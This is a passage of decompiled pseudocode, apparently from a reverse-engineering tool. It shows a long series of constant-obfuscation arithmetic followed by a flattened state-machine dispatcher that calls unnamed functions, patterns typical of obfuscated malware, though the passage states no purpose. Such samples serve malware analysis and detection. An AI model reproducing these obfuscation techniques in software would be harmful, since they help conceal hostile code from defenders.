                                                                                                                				_v412 = _v412 >> 0xf;
                                                                                                                				_v412 = _v412 ^ 0x00033b8b;
                                                                                                                				_v468 = 0x2dd65f;
                                                                                                                				_v468 = _v468 + 0xffff214c;
                                                                                                                				_v468 = _v468 + 0xffffe4f9;
                                                                                                                				_v468 = _v468 ^ 0x002ca3b6;
                                                                                                                				_v280 = 0xd6834;
                                                                                                                				_v280 = _v280 ^ 0x3643ef73;
                                                                                                                				_v280 = _v280 ^ 0x3640c712;
                                                                                                                				_v488 = 0x731e5a;
                                                                                                                				_v488 = _v488 >> 0xd;
                                                                                                                				_v488 = _v488 ^ 0x0009379c;
                                                                                                                				_v540 = 0x87d895;
                                                                                                                				_v540 = _v540 ^ 0x6cffe6c5;
                                                                                                                				_t1218 = 0x17;
                                                                                                                				_v540 = _v540 / _t1218;
                                                                                                                				_v540 = _v540 ^ 0x36ff81d5;
                                                                                                                				_v540 = _v540 ^ 0x324d3316;
                                                                                                                				_v624 = 0xbf3a20;
                                                                                                                				_t1331 = 0x79;
                                                                                                                				_v624 = _v624 / _t1331;
                                                                                                                				_v624 = _v624 | 0xb4dd3a1b;
                                                                                                                				_t1219 = 0x57;
                                                                                                                				_v624 = _v624 / _t1219;
                                                                                                                				_v624 = _v624 ^ 0x0217a425;
                                                                                                                				_v244 = 0xd0066a;
                                                                                                                				_v244 = _v244 ^ 0x2fa8a3b9;
                                                                                                                				_v244 = _v244 ^ 0x2f711d38;
                                                                                                                				_v248 = 0x415bf8;
                                                                                                                				_v248 = _v248 + 0x5bb7;
                                                                                                                				_v248 = _v248 ^ 0x00424d84;
                                                                                                                				_v504 = 0xdb73be;
                                                                                                                				_v504 = _v504 ^ 0x694e6d3a;
                                                                                                                				_v504 = _v504 << 1;
                                                                                                                				_v504 = _v504 ^ 0xd32d13ee;
                                                                                                                				_v304 = 0x6fa172;
                                                                                                                				_v304 = _v304 << 7;
                                                                                                                				_v304 = _v304 ^ 0x37d11235;
                                                                                                                				_v608 = 0x5f493;
                                                                                                                				_t1220 = 9;
                                                                                                                				_v608 = _v608 * 0x5e;
                                                                                                                				_v608 = _v608 | 0xb40157d3;
                                                                                                                				_t1221 = 0x6c;
                                                                                                                				_v608 = _v608 / _t1220;
                                                                                                                				_v608 = _v608 ^ 0x143210ff;
                                                                                                                				_v276 = 0xb50cda;
                                                                                                                				_v276 = _v276 ^ 0x8350dce4;
                                                                                                                				_v276 = _v276 ^ 0x83e65b58;
                                                                                                                				_v560 = 0xfbf14e;
                                                                                                                				_v560 = _v560 / _t1221;
                                                                                                                				_v560 = _v560 << 5;
                                                                                                                				_v560 = _v560 << 0xd;
                                                                                                                				_v560 = _v560 ^ 0x54cda336;
                                                                                                                				_v596 = 0xf785b2;
                                                                                                                				_t1222 = 0x56;
                                                                                                                				_v596 = _v596 / _t1222;
                                                                                                                				_v596 = _v596 ^ 0x884e9446;
                                                                                                                				_v596 = _v596 | 0x7c3d27f0;
                                                                                                                				_v596 = _v596 ^ 0xfc76e39a;
                                                                                                                				_v384 = 0x9ce58e;
                                                                                                                				_v384 = _v384 | 0x76fbd121;
                                                                                                                				_v384 = _v384 << 0xa;
                                                                                                                				_v384 = _v384 ^ 0xffdc2ef6;
                                                                                                                				_v392 = 0x89e08c;
                                                                                                                				_v392 = _v392 + 0xf7c8;
                                                                                                                				_v392 = _v392 << 8;
                                                                                                                				_v392 = _v392 ^ 0x8ad4b6a7;
                                                                                                                				_v620 = 0xb5614d;
                                                                                                                				_v620 = _v620 | 0xbfdfeffe;
                                                                                                                				_t1223 = 0xe;
                                                                                                                				_v620 = _v620 / _t1223;
                                                                                                                				_v620 = _v620 ^ 0x0db4d036;
                                                                                                                				_v512 = 0xf71f7c;
                                                                                                                				_t1224 = 0x5b;
                                                                                                                				_v512 = _v512 * 0x25;
                                                                                                                				_v512 = _v512 >> 1;
                                                                                                                				_v512 = _v512 ^ 0x11dc483c;
                                                                                                                				_v328 = 0x3f9f09;
                                                                                                                				_v328 = _v328 / _t1224;
                                                                                                                				_v328 = _v328 ^ 0x000b0d90;
                                                                                                                				_v520 = 0x4dbd03;
                                                                                                                				_v520 = _v520 | 0xeff9ab1e;
                                                                                                                				_v520 = _v520 ^ 0xeffca3a3;
                                                                                                                				_v588 = 0x775a74;
                                                                                                                				_t1225 = 0x35;
                                                                                                                				_v588 = _v588 * 0x43;
                                                                                                                				_v588 = _v588 | 0xb0f5363d;
                                                                                                                				_v588 = _v588 + 0x53fb;
                                                                                                                				_v588 = _v588 ^ 0xbff73e87;
                                                                                                                				_v456 = 0x7b00ff;
                                                                                                                				_v456 = _v456 | 0xd60edd5a;
                                                                                                                				_v456 = _v456 + 0x45e4;
                                                                                                                				_v456 = _v456 ^ 0xd683b8e1;
                                                                                                                				_v464 = 0x7ee271;
                                                                                                                				_v464 = _v464 / _t1225;
                                                                                                                				_v464 = _v464 + 0xffffdf7f;
                                                                                                                				_v464 = _v464 ^ 0x00000060;
                                                                                                                				_v572 = 0x4e3c7e;
                                                                                                                				_v572 = _v572 + 0x8d71;
                                                                                                                				_v572 = _v572 << 1;
                                                                                                                				_t1226 = 0x4e;
                                                                                                                				_v572 = _v572 / _t1226;
                                                                                                                				_v572 = _v572 ^ 0x00011055;
                                                                                                                				_v240 = 0x23c079;
                                                                                                                				_v240 = _v240 | 0x2230f8c1;
                                                                                                                				_v240 = _v240 ^ 0x22376e18;
                                                                                                                				_v580 = 0x6da23d;
                                                                                                                				_v580 = _v580 + 0xffff59ff;
                                                                                                                				_t1227 = 0x62;
                                                                                                                				_v580 = _v580 * 0xd;
                                                                                                                				_v580 = _v580 * 0x56;
                                                                                                                				_v580 = _v580 ^ 0xdbfc81b2;
                                                                                                                				_v440 = 0xb2fa26;
                                                                                                                				_v440 = _v440 / _t1227;
                                                                                                                				_v440 = _v440 / _t1227;
                                                                                                                				_v440 = _v440 ^ 0x000a6643;
                                                                                                                				_v448 = 0x71395;
                                                                                                                				_t1228 = 0x58;
                                                                                                                				_v448 = _v448 / _t1228;
                                                                                                                				_v448 = _v448 + 0x160f;
                                                                                                                				_v448 = _v448 ^ 0x000d8143;
                                                                                                                				_v548 = 0xcab6ec;
                                                                                                                				_v548 = _v548 + 0xffff3a85;
                                                                                                                				_v548 = _v548 ^ 0x79f4ccd4;
                                                                                                                				_v548 = _v548 ^ 0x66039678;
                                                                                                                				_v548 = _v548 ^ 0x1f385ba3;
                                                                                                                				_v432 = 0x450687;
                                                                                                                				_t1229 = 0x3b;
                                                                                                                				_v432 = _v432 / _t1229;
                                                                                                                				_v432 = _v432 ^ 0xb5170e0b;
                                                                                                                				_v432 = _v432 ^ 0xb516014b;
                                                                                                                				_v556 = 0x75b355;
                                                                                                                				_v556 = _v556 >> 9;
                                                                                                                				_v556 = _v556 | 0xe14125a9;
                                                                                                                				_t1230 = 0x52;
                                                                                                                				_v556 = _v556 / _t1230;
                                                                                                                				_v556 = _v556 ^ 0x02b5a7dd;
                                                                                                                				_v564 = 0x55068;
                                                                                                                				_v564 = _v564 + 0xea29;
                                                                                                                				_v564 = _v564 + 0x2a6b;
                                                                                                                				_v564 = _v564 ^ 0x074a4649;
                                                                                                                				_v564 = _v564 ^ 0x074ae023;
                                                                                                                				_v408 = 0x7e8ea0;
                                                                                                                				_v408 = _v408 | 0x93f1e9ef;
                                                                                                                				_t1231 = 0x2f;
                                                                                                                				_v408 = _v408 * 0x60;
                                                                                                                				_v408 = _v408 ^ 0x7ffd72ee;
                                                                                                                				_v416 = 0x95dfba;
                                                                                                                				_v416 = _v416 + 0xfffffb64;
                                                                                                                				_v416 = _v416 / _t1231;
                                                                                                                				_v416 = _v416 ^ 0x0006b3da;
                                                                                                                				_v424 = 0xd0e855;
                                                                                                                				_v424 = _v424 << 6;
                                                                                                                				_v424 = _v424 + 0xffffe003;
                                                                                                                				_v424 = _v424 ^ 0x3430bde3;
                                                                                                                				_v516 = 0x13498e;
                                                                                                                				_v516 = _v516 ^ 0x5ac55d59;
                                                                                                                				_v516 = _v516 ^ 0x5ad19acf;
                                                                                                                				_v404 = 0x14b208;
                                                                                                                				_v404 = _v404 + 0xffffc7ba;
                                                                                                                				_v404 = _v404 >> 0xf;
                                                                                                                				_v404 = _v404 ^ 0x000fe931;
                                                                                                                				_v292 = 0x9c1e77;
                                                                                                                				_v292 = _v292 * 0x1e;
                                                                                                                				_v292 = _v292 ^ 0x124661fa;
                                                                                                                				_v452 = 0x432303;
                                                                                                                				_v452 = _v452 + 0x8c;
                                                                                                                				_v452 = _v452 + 0xffffeaed;
                                                                                                                				_v452 = _v452 ^ 0x0047ecf5;
                                                                                                                				_v236 = 0xd5ea6d;
                                                                                                                				_v236 = _v236 + 0xa7e0;
                                                                                                                				_v236 = _v236 ^ 0x00d6b0d7;
                                                                                                                				_v616 = 0xc6dd44;
                                                                                                                				_v616 = _v616 + 0xffffbd73;
                                                                                                                				_v616 = _v616 >> 0xb;
                                                                                                                				_v616 = _v616 | 0xe03c420e;
                                                                                                                				_v616 = _v616 ^ 0xe03bf24e;
                                                                                                                				_v536 = 0xba7530;
                                                                                                                				_v536 = _v536 + 0x72f1;
                                                                                                                				_v536 = _v536 | 0x94d2087c;
                                                                                                                				_v536 = _v536 ^ 0x94f643a3;
                                                                                                                				_v604 = 0xb1e42;
                                                                                                                				_v604 = _v604 >> 0xa;
                                                                                                                				_v604 = _v604 + 0xfffffb0f;
                                                                                                                				_v604 = _v604 | 0x8ee58e1a;
                                                                                                                				_v604 = _v604 ^ 0xfffb9f44;
                                                                                                                				_v288 = 0x5d7e80;
                                                                                                                				_v288 = _v288 * 0x59;
                                                                                                                				_v288 = _v288 ^ 0x20875c36;
                                                                                                                				_v296 = 0x7e9e0e;
                                                                                                                				_v296 = _v296 >> 0xa;
                                                                                                                				_v296 = _v296 ^ 0x0008d1d9;
                                                                                                                				_v232 = 0x3bd50b;
                                                                                                                				_v232 = _v232 + 0xa631;
                                                                                                                				_v232 = _v232 ^ 0x0033c4c7;
                                                                                                                				_v380 = 0xd0cc65;
                                                                                                                				_v380 = _v380 + 0x5ac3;
                                                                                                                				_v380 = _v380 / _t1331;
                                                                                                                				_v380 = _v380 ^ 0x000ebae4;
                                                                                                                				_v300 = 0x7efed4;
                                                                                                                				_v300 = _v300 ^ 0x96138021;
                                                                                                                				_v300 = _v300 ^ 0x9667345e;
                                                                                                                				_v268 = 0x96ae5e;
                                                                                                                				_v268 = _v268 + 0x1eb5;
                                                                                                                				_v268 = _v268 ^ 0x009d6d6e;
                                                                                                                				_v336 = 0xe947f7;
                                                                                                                				_t1232 = 0x65;
                                                                                                                				_v336 = _v336 / _t1232;
                                                                                                                				_v336 = _v336 ^ 0x000ff056;
                                                                                                                				_v344 = 0x5a3996;
                                                                                                                				_v344 = _v344 | 0x1a74a1fb;
                                                                                                                				_v344 = _v344 ^ 0x1a7cd09a;
                                                                                                                				_v436 = 0x391cb3;
                                                                                                                				_v436 = _v436 | 0xcca25f2b;
                                                                                                                				_v436 = _v436 >> 9;
                                                                                                                				_v436 = _v436 ^ 0x006e60b2;
                                                                                                                				_v628 = 0x93e64c;
                                                                                                                				_v628 = _v628 + 0xffff7602;
                                                                                                                				_v628 = _v628 / _t1232;
                                                                                                                				_v628 = _v628 + 0x245f;
                                                                                                                				_v628 = _v628 ^ 0x000faf9b;
                                                                                                                				_v472 = 0x4a41f4;
                                                                                                                				_v472 = _v472 << 4;
                                                                                                                				_t1233 = 6;
                                                                                                                				_v472 = _v472 / _t1233;
                                                                                                                				_v472 = _v472 ^ 0x00c099e1;
                                                                                                                				_v256 = 0xbae68c;
                                                                                                                				_v256 = _v256 + 0xffffff2d;
                                                                                                                				_v256 = _v256 ^ 0x00b974fc;
                                                                                                                				_v264 = 0xe755ee;
                                                                                                                				_v264 = _v264 ^ 0xac1ce6e7;
                                                                                                                				_v264 = _v264 ^ 0xacff78f7;
                                                                                                                				_v480 = 0x1d500d;
                                                                                                                				_v480 = _v480 ^ 0xef041acd;
                                                                                                                				_v480 = _v480 << 0xe;
                                                                                                                				_v480 = _v480 ^ 0x52b27d9f;
                                                                                                                				_v360 = 0x2b4726;
                                                                                                                				_t552 =  &_v360; // 0x2b4726
                                                                                                                				_t1234 = 0x1d;
                                                                                                                				_v360 =  *_t552 / _t1234;
                                                                                                                				_v360 = _v360 << 2;
                                                                                                                				_v360 = _v360 ^ 0x000bf356;
                                                                                                                				_v524 = 0xc6f7c6;
                                                                                                                				_v524 = _v524 | 0x82d65f7e;
                                                                                                                				_v524 = _v524 * 0x56;
                                                                                                                				_v524 = _v524 ^ 0xf4348e84;
                                                                                                                				_v260 = 0x5b6e28;
                                                                                                                				_v260 = _v260 >> 3;
                                                                                                                				_v260 = _v260 ^ 0x000349e3;
                                                                                                                				_v352 = 0x889eb4;
                                                                                                                				_t1235 = 0x71;
                                                                                                                				_v352 = _v352 / _t1235;
                                                                                                                				_v352 = _v352 + 0xfffffe08;
                                                                                                                				_v352 = _v352 ^ 0x0008be33;
                                                                                                                				_v340 = 0x4fec78;
                                                                                                                				_v340 = _v340 ^ 0xf7d41a30;
                                                                                                                				_v340 = _v340 ^ 0xf79d2b7e;
                                                                                                                				_v660 = 0x5c5169;
                                                                                                                				_v660 = _v660 + 0xffff2f19;
                                                                                                                				_v660 = _v660 | 0xea9193d4;
                                                                                                                				_v660 = _v660 >> 9;
                                                                                                                				_v660 = _v660 ^ 0x007507aa;
                                                                                                                				_v664 = 0xba5866;
                                                                                                                				_v664 = _v664 + 0x4058;
                                                                                                                				_t1236 = 0x1b;
                                                                                                                				_v664 = _v664 * 0x45;
                                                                                                                				_v664 = _v664 + 0xffff3611;
                                                                                                                				_v664 = _v664 ^ 0x3246f857;
                                                                                                                				_v208 = 0xffb86c;
                                                                                                                				_v208 = _v208 + 0x421b;
                                                                                                                				_v208 = _v208 ^ 0x00f24483;
                                                                                                                				_v644 = 0xaeef45;
                                                                                                                				_v644 = _v644 ^ 0x3640ba6e;
                                                                                                                				_v644 = _v644 + 0x6e9a;
                                                                                                                				_v644 = _v644 + 0x5c27;
                                                                                                                				_v644 = _v644 ^ 0x36e53c18;
                                                                                                                				_v652 = 0xe2026d;
                                                                                                                				_v652 = _v652 << 6;
                                                                                                                				_v652 = _v652 | 0xfb2bafae;
                                                                                                                				_v652 = _v652 ^ 0xfbabc300;
                                                                                                                				_v640 = 0xc39925;
                                                                                                                				_v640 = _v640 + 0xffff9369;
                                                                                                                				_v640 = _v640 + 0xffff9a62;
                                                                                                                				_v640 = _v640 | 0x61adcb6e;
                                                                                                                				_v640 = _v640 ^ 0x61e9af9b;
                                                                                                                				_v428 = 0xbbb252;
                                                                                                                				_v428 = _v428 << 0xf;
                                                                                                                				_v428 = _v428 >> 5;
                                                                                                                				_v428 = _v428 ^ 0x06cf00bc;
                                                                                                                				_v508 = 0x8319d;
                                                                                                                				_v508 = _v508 / _t1236;
                                                                                                                				_t1237 = 0xc;
                                                                                                                				_v508 = _v508 * 0x5b;
                                                                                                                				_v508 = _v508 ^ 0x001984ba;
                                                                                                                				_v388 = 0x309b23;
                                                                                                                				_v388 = _v388 << 3;
                                                                                                                				_v388 = _v388 + 0xffffbf11;
                                                                                                                				_v388 = _v388 ^ 0x0186bbc5;
                                                                                                                				_v212 = 0x3c69a0;
                                                                                                                				_v212 = _v212 | 0x128d54ae;
                                                                                                                				_v212 = _v212 ^ 0x12ba7a05;
                                                                                                                				_v552 = 0x656d5c;
                                                                                                                				_v552 = _v552 * 5;
                                                                                                                				_v552 = _v552 / _t1237;
                                                                                                                				_v552 = _v552 << 5;
                                                                                                                				_v552 = _v552 ^ 0x0544bf18;
                                                                                                                				_v484 = 0xb731d0;
                                                                                                                				_v484 = _v484 >> 1;
                                                                                                                				_v484 = _v484 + 0xb70;
                                                                                                                				_v484 = _v484 ^ 0x005a1073;
                                                                                                                				_v584 = 0x42febc;
                                                                                                                				_t1238 = 0x30;
                                                                                                                				_v584 = _v584 / _t1238;
                                                                                                                				_v584 = _v584 ^ 0x82a01eec;
                                                                                                                				_v584 = _v584 + 0xffff63b4;
                                                                                                                				_v584 = _v584 ^ 0x82a49767;
                                                                                                                				_v420 = 0x33bce3;
                                                                                                                				_v420 = _v420 + 0x5f3a;
                                                                                                                				_v420 = _v420 ^ 0x33acce0b;
                                                                                                                				_v420 = _v420 ^ 0x339b5571;
                                                                                                                				_v612 = 0xb48e5c;
                                                                                                                				_v612 = _v612 | 0x5d1288ac;
                                                                                                                				_t1239 = 0x26;
                                                                                                                				_v612 = _v612 / _t1239;
                                                                                                                				_t1240 = 0x23;
                                                                                                                				_v612 = _v612 * 0x2b;
                                                                                                                				_v612 = _v612 ^ 0x6a080ea8;
                                                                                                                				_v312 = 0xe5561f;
                                                                                                                				_v312 = _v312 ^ 0xa4838f74;
                                                                                                                				_v312 = _v312 ^ 0xa46ed942;
                                                                                                                				_v320 = 0x1f876;
                                                                                                                				_v320 = _v320 + 0xffff0bb4;
                                                                                                                				_v320 = _v320 ^ 0x00098e04;
                                                                                                                				_v600 = 0x6a4f20;
                                                                                                                				_v600 = _v600 + 0xc61e;
                                                                                                                				_v600 = _v600 << 0xa;
                                                                                                                				_v600 = _v600 + 0xecf4;
                                                                                                                				_v600 = _v600 ^ 0xac5f50b8;
                                                                                                                				_v368 = 0x3eab4;
                                                                                                                				_v368 = _v368 << 0xc;
                                                                                                                				_v368 = _v368 ^ 0x5c2fe17e;
                                                                                                                				_v368 = _v368 ^ 0x628c9d92;
                                                                                                                				_v544 = 0xc2b57f;
                                                                                                                				_v544 = _v544 >> 9;
                                                                                                                				_v544 = _v544 >> 4;
                                                                                                                				_v544 = _v544 | 0x5f2ddc88;
                                                                                                                				_v544 = _v544 ^ 0x5f2b9b12;
                                                                                                                				_v444 = 0x9620c9;
                                                                                                                				_v444 = _v444 | 0x6df3b9f0;
                                                                                                                				_v444 = _v444 ^ 0x01763db6;
                                                                                                                				_v444 = _v444 ^ 0x6c8b9884;
                                                                                                                				_v568 = 0x6ff70d;
                                                                                                                				_v568 = _v568 / _t1240;
                                                                                                                				_v568 = _v568 | 0x0a121cc0;
                                                                                                                				_v568 = _v568 ^ 0x4200c7d3;
                                                                                                                				_v568 = _v568 ^ 0x48110594;
                                                                                                                				_v372 = 0xbadb2b;
                                                                                                                				_v372 = _v372 + 0x7876;
                                                                                                                				_v372 = _v372 * 0x66;
                                                                                                                				_v372 = _v372 ^ 0x4aa73bce;
                                                                                                                				_v648 = 0xe35d36;
                                                                                                                				_v648 = _v648 + 0xffff85c1;
                                                                                                                				_v648 = _v648 >> 1;
                                                                                                                				_v648 = _v648 * 0x53;
                                                                                                                				_v648 = _v648 ^ 0x24ccffcc;
                                                                                                                				_v252 = 0xec5be8;
                                                                                                                				_v252 = _v252 >> 0xa;
                                                                                                                				_v252 = _v252 ^ 0x00007d6c;
                                                                                                                				_v324 = 0xd3bcb5;
                                                                                                                				_v324 = _v324 | 0x8fa4956b;
                                                                                                                				_v324 = _v324 ^ 0x8ff8f5ad;
                                                                                                                				_v220 = 0xab0bb9;
                                                                                                                				_v220 = _v220 * 0x4b;
                                                                                                                				_v220 = _v220 ^ 0x321cfccf;
                                                                                                                				_v316 = 0x3c6ca8;
                                                                                                                				_v316 = _v316 | 0xb591dba3;
                                                                                                                				_v316 = _v316 ^ 0xb5b71e42;
                                                                                                                				_v376 = 0x54e722;
                                                                                                                				_v376 = _v376 ^ 0x5566e394;
                                                                                                                				_v376 = _v376 ^ 0x553ab1a0;
                                                                                                                				_v528 = 0xc5f307;
                                                                                                                				_t1241 = 0x70;
                                                                                                                				_t1214 = _v516;
                                                                                                                				_v528 = _v528 * 0x49;
                                                                                                                				_v528 = _v528 << 8;
                                                                                                                				_v528 = _v528 ^ 0x724c544f;
                                                                                                                				_v532 = 0x31c184;
                                                                                                                				_v532 = _v532 / _t1241;
                                                                                                                				_v532 = _v532 << 0xf;
                                                                                                                				_v532 = _v532 ^ 0x38d3a143;
                                                                                                                				_v400 = 0x2ecfb7;
                                                                                                                				_v400 = _v400 + 0x2722;
                                                                                                                				_v400 = _v400 + 0x9347;
                                                                                                                				_v400 = _v400 ^ 0x011bef8a;
                                                                                                                				_v348 = 0x9fa66c;
                                                                                                                				_v348 = _v348 + 0xbc6c;
                                                                                                                				_v348 = _v348 ^ 0x00a045c8;
                                                                                                                				_v332 = 0xe1753e;
                                                                                                                				_v332 = _v332 + 0x207f;
                                                                                                                				_v332 = _v332 ^ 0x00e195bc;
                                                                                                                				_v364 = 0x9b5621;
                                                                                                                				_v364 = _v364 ^ 0x7b4155b9;
                                                                                                                				_v364 = _v364 ^ 0x65279ba2;
                                                                                                                				_v364 = _v364 ^ 0x1efd979a;
                                                                                                                				_v284 = 0xb7f987;
                                                                                                                				_v284 = _v284 ^ 0x05a84371;
                                                                                                                				_v284 = _v284 ^ 0x051fa5b6;
                                                                                                                				_v636 = 0x550b41;
                                                                                                                				_v636 = _v636 + 0xffff5f3e;
                                                                                                                				_v636 = _v636 | 0x46b7c709;
                                                                                                                				_v636 = _v636 + 0x2da;
                                                                                                                				_v636 = _v636 ^ 0x46fa49f9;
                                                                                                                				_v632 = 0x3f908b;
                                                                                                                				_v632 = _v632 + 0xcb8;
                                                                                                                				_v632 = _v632 + 0x8c6c;
                                                                                                                				_v632 = _v632 + 0xcc8b;
                                                                                                                				_v632 = _v632 ^ 0x004d4d9a;
                                                                                                                				_v396 = 0x422338;
                                                                                                                				_v396 = _v396 >> 9;
                                                                                                                				_v396 = _v396 + 0x416c;
                                                                                                                				_v396 = _v396 ^ 0x000e965d;
                                                                                                                				_v492 = 0xfee10f;
                                                                                                                				_v492 = _v492 << 0xd;
                                                                                                                				_v492 = _v492 << 2;
                                                                                                                				_v492 = _v492 ^ 0x70897420;
                                                                                                                				_v356 = 0xa45992;
                                                                                                                				_v356 = _v356 * 0x39;
                                                                                                                				_v356 = _v356 ^ 0xff8e7b20;
                                                                                                                				_v356 = _v356 ^ 0xdb19ff92;
                                                                                                                				_v308 = 0x3365d6;
                                                                                                                				_v308 = _v308 << 0xd;
                                                                                                                				_v308 = _v308 ^ 0x6cba2a60;
                                                                                                                				goto L1;
                                                                                                                				do {
                                                                                                                					while(1) {
                                                                                                                						L1:
                                                                                                                						_t1372 = _t1337 - 0x7995fdf;
                                                                                                                						if(_t1372 <= 0) {
                                                                                                                							break;
                                                                                                                						}
                                                                                                                						__eflags = _t1337 - 0xc9b469d;
                                                                                                                						if(__eflags > 0) {
                                                                                                                							__eflags = _t1337 - 0xf3eadf0;
                                                                                                                							if(__eflags > 0) {
                                                                                                                								__eflags = _t1337 - 0xf57c199;
                                                                                                                								if(_t1337 == 0xf57c199) {
                                                                                                                									E001BFECB(_v384, _v392);
                                                                                                                									_pop(_t1243);
                                                                                                                									_t1337 = 0x56c9a7a;
                                                                                                                									goto L109;
                                                                                                                								}
                                                                                                                								__eflags = _t1337 - 0xf7abf0a;
                                                                                                                								if(_t1337 == 0xf7abf0a) {
                                                                                                                									E001BD15E();
                                                                                                                									_t1337 = 0x30ceba0;
                                                                                                                									continue;
                                                                                                                								}
                                                                                                                								__eflags = _t1337 - 0xfc6825e;
                                                                                                                								if(__eflags != 0) {
                                                                                                                									goto L109;
                                                                                                                								}
                                                                                                                								_t1144 = _v400;
                                                                                                                								_t1337 = 0x1c5bef0;
                                                                                                                								_v136 = _t1144;
                                                                                                                								continue;
                                                                                                                							}
                                                                                                                							if(__eflags == 0) {
                                                                                                                								_v196 = E001B8EF8(_v588,  &_v192, __eflags, _v456, _v464, 0x1a12f0);
                                                                                                                								_v204 = E001B8EF8(_v572,  &_v200, __eflags, _v240, _v580, 0x1a1290);
                                                                                                                								_t1179 = E001B3231( &_v204,  &_v196, _v440, _v448);
                                                                                                                								asm("sbb esi, esi");
                                                                                                                								_t1337 = ( ~_t1179 & 0x0011f56e) + 0x56c9a7a;
                                                                                                                								E001BF94B(_v204, _v548, _v432, _v556, _v564);
                                                                                                                								_t1243 = _v196;
                                                                                                                								_t1144 = E001BF94B(_v196, _v408, _v416, _v424, _v516);
                                                                                                                								_t1367 = _t1367 + 0x38;
                                                                                                                								goto L109;
                                                                                                                							}
                                                                                                                							__eflags = _t1337 - 0xcf8b025;
                                                                                                                							if(_t1337 == 0xcf8b025) {
                                                                                                                								_t1144 = E001B8131();
                                                                                                                								_t1337 = 0xc68006d;
                                                                                                                								continue;
                                                                                                                							}
                                                                                                                							__eflags = _t1337 - 0xcfa631a;
                                                                                                                							if(_t1337 == 0xcfa631a) {
                                                                                                                								_t1243 =  &_v188;
                                                                                                                								_t1144 = E001AE65A( &_v188, _v472, _v256,  &_v172, _v264, _v480);
                                                                                                                								_t1367 = _t1367 + 0x10;
                                                                                                                								asm("sbb esi, esi");
                                                                                                                								_t1337 = ( ~_t1144 & 0xfdcbdec0) + 0x5fa6df0;
                                                                                                                								continue;
                                                                                                                							}
                                                                                                                							__eflags = _t1337 - 0xe12afcd;
                                                                                                                							if(_t1337 == 0xe12afcd) {
                                                                                                                								_t1144 = E001B26F3();
                                                                                                                								_t1337 = 0xf57c199;
                                                                                                                								continue;
                                                                                                                							}
                                                                                                                							__eflags = _t1337 - 0xf20de42;
                                                                                                                							if(_t1337 != 0xf20de42) {
                                                                                                                								goto L109;
                                                                                                                							}
                                                                                                                							_t1144 = E001B416E();
                                                                                                                							__eflags = _t1144;
                                                                                                                							if(__eflags == 0) {
                                                                                                                								L113:
                                                                                                                								return _t1144;
                                                                                                                							}
                                                                                                                							_t1337 = 0x70b268f;
                                                                                                                							continue;
                                                                                                                						}
                                                                                                                						if(__eflags == 0) {
                                                                                                                							_t1144 = E001ACDE0();
                                                                                                                							goto L113;
                                                                                                                						}
                                                                                                                						__eflags = _t1337 - 0xac07698;
                                                                                                                						if(__eflags > 0) {
                                                                                                                							__eflags = _t1337 - 0xb031350;
                                                                                                                							if(_t1337 == 0xb031350) {
                                                                                                                								_t1144 = E001B604B();
                                                                                                                								asm("sbb esi, esi");
                                                                                                                								_t1347 =  ~_t1144 & 0x06f8aa7b;
                                                                                                                								L36:
                                                                                                                								_t1337 = _t1347 + 0x85f171e;
                                                                                                                								continue;
                                                                                                                							}
                                                                                                                							__eflags = _t1337 - 0xc05109e;
                                                                                                                							if(__eflags == 0) {
                                                                                                                								_t1337 = 0x8c289b;
                                                                                                                								continue;
                                                                                                                							}
                                                                                                                							__eflags = _t1337 - 0xc3326f0;
                                                                                                                							if(_t1337 == 0xc3326f0) {
                                                                                                                								_v156 = E001A7F28();
                                                                                                                								_t1144 = E001AAE33(_v604, _v288, _t1190, _v296);
                                                                                                                								_pop(_t1243);
                                                                                                                								_v152 = _t1144;
                                                                                                                								_t1337 = 0xbef06d;
                                                                                                                								continue;
                                                                                                                							}
                                                                                                                							__eflags = _t1337 - 0xc68006d;
                                                                                                                							if(_t1337 != 0xc68006d) {
                                                                                                                								goto L109;
                                                                                                                							}
                                                                                                                							_t1144 = E001A82D2();
                                                                                                                							__eflags = _t1144;
                                                                                                                							if(__eflags == 0) {
                                                                                                                								goto L113;
                                                                                                                							}
                                                                                                                							_t1337 = 0x6090739;
                                                                                                                							continue;
                                                                                                                						}
                                                                                                                						if(__eflags == 0) {
                                                                                                                							_t1144 = E001BF5CD();
                                                                                                                							__eflags = _t1144;
                                                                                                                							if(__eflags == 0) {
                                                                                                                								_t1144 = E001BD4AE();
                                                                                                                							}
                                                                                                                							L71:
                                                                                                                							_t1337 = 0x1da2a96;
                                                                                                                							continue;
                                                                                                                						}
                                                                                                                						__eflags = _t1337 - 0x85f171e;
                                                                                                                						if(_t1337 == 0x85f171e) {
                                                                                                                							_t1144 = E001A8EE5();
                                                                                                                							_t1337 = 0x8f0aafa;
                                                                                                                							continue;
                                                                                                                						}
                                                                                                                						__eflags = _t1337 - 0x8f0aafa;
                                                                                                                						if(_t1337 == 0x8f0aafa) {
                                                                                                                							_t1144 = E001C1FC7();
                                                                                                                							_t1337 = 0xf3eadf0;
                                                                                                                							continue;
                                                                                                                						}
                                                                                                                						__eflags = _t1337 - 0xa5ca83d;
                                                                                                                						if(_t1337 == 0xa5ca83d) {
                                                                                                                							_t1243 =  &_v144;
                                                                                                                							_t1144 = E001C22A1( &_v144, _v336, _v344, _v436, _v628);
                                                                                                                							_t1367 = _t1367 + 0xc;
                                                                                                                							_t1337 = 0xcfa631a;
                                                                                                                							continue;
                                                                                                                						}
                                                                                                                						__eflags = _t1337 - 0xaabfc75;
                                                                                                                						if(_t1337 != 0xaabfc75) {
                                                                                                                							goto L109;
                                                                                                                						}
                                                                                                                						_t1199 = E001A188C( &_v76, _v660,  &_v180, _v664,  &_v76);
                                                                                                                						_pop(_t1243);
                                                                                                                						__eflags = _t1199;
                                                                                                                						if(_t1199 != 0) {
                                                                                                                							_t1144 = _v48;
                                                                                                                							__eflags = _t1144 - 8;
                                                                                                                							if(__eflags != 0) {
                                                                                                                								__eflags = _t1144;
                                                                                                                								if(__eflags == 0) {
                                                                                                                									L76:
                                                                                                                									_t1337 = 0x3624656;
                                                                                                                									continue;
                                                                                                                								}
                                                                                                                								__eflags = _t1144 - 1;
                                                                                                                								if(__eflags != 0) {
                                                                                                                									goto L71;
                                                                                                                								}
                                                                                                                								goto L76;
                                                                                                                							}
                                                                                                                							_t1337 = 0xc9b469d;
                                                                                                                							continue;
                                                                                                                						}
                                                                                                                						_push(_v396);
                                                                                                                						_t1144 = E001B96D4(_t1243, _v636);
                                                                                                                						_t1367 = _t1367 + 0xc;
                                                                                                                						_t1335 = _t1144;
                                                                                                                						_t1214 = 0xa5ca83d;
                                                                                                                						goto L71;
                                                                                                                					}
                                                                                                                					if(_t1372 == 0) {
                                                                                                                						_v132 = E001C26FC();
